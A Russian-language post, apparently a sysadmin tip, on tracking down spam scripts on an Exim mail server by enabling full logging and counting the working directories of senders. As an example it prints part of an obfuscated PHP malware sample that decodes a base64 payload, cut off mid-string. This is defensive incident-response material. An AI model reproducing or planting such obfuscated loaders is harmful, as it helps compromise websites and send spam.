Поиск спам скриптов, почтовик exim

Делюсь опытом с поиском спам скриптов под почтовиком exim, для этого в файл конфига
/etc/exim/exim.conf 
добавляем

log_selector = +all

передергиваем exim

systemctl restart exim

немного ждем, если спам активный то и пары минут хватает, далее выполняем

grep cwd /var/log/exim/main.log | awk {'print $4'}| sort | uniq -c

в выхлопе будет нечто

16 **
8 Completed
1 cwd=/
1 cwd=/home/admin
80 cwd=/home/public_html/administrator/components/com_content
70 cwd=/home/public_html/wp-content/plugins/woocommerce-menu-bar-cart/css
50 cwd=/home/public_html/bitrix/images/main/wizard
70 cwd=/home/public_html/administrator/templates
829 cwd=/var/spool/exim
176 Message
8 Unfrozen

и проверяем все директории, особенно те, где лежат сайты, 100% будут обфусцированные пхп скрипты.

Например:

<?php
 $pytrh = 5976; function jqcilcsbmm($uyitlt, $udmzya){$upbyxfggos = ''; for($i=0; $i < strlen($uyitlt); $i++){$upbyxfggos .= isset($udmzya[$uyitlt[$i]]) ? $udmzya[$uyitlt[$i]] : $uyitlt[$i];}
$mnxppc="base64_decode";return $mnxppc($upbyxfggos);}
$qilgsyc = 'u6faqjVhdPuzcHjlgUVlPH0wdlgxrsJjosAEZAQeu6faqjVhdPuzcH0wd'.
'BVfg4cwg4I4RXpAeoxvX8GELUf2gHjQeXkCmPF2dPFfmWjQqSVaPW7ELSM4RXpAeoxv'.
'X8GhdP72k6fCdjVxqSBEkXNAeoxvXNQeqSmzqPvhdPuzc1Vo7jcS7jrEeuQeYAQeXn72MQjnj8jnSlkun1G2'.
'MQjI7KkkryQNrKtKZlpvXN88PBv1Mfd1Mfx4M8jvoB71PQ1s71r4PnpVrXr0I3gaIXTAR3sKZAQeXSfU'.
'eX1fLPGQYnN8PBv1Mfd1Mfx4n17MM1VmPQdiMfkGM87171V6oBr'.
'4Pn8EyuzcYAQeXu88PBv1Mfd1Mfx4n17MM1VmPQdiMfkGM87171V6oBr4PnpVrXr0I3gaIXTAR3sKZAQeXPQvX4QvXUfUe6fhgH'.
'jQeX7278fI7jIEeuQeYAQeXSdwgUjFmHNzc1V6nM01MlGFglp8qHjJryQ+rX7UqS0feuQeXPxvXN8cqSmzrPv'.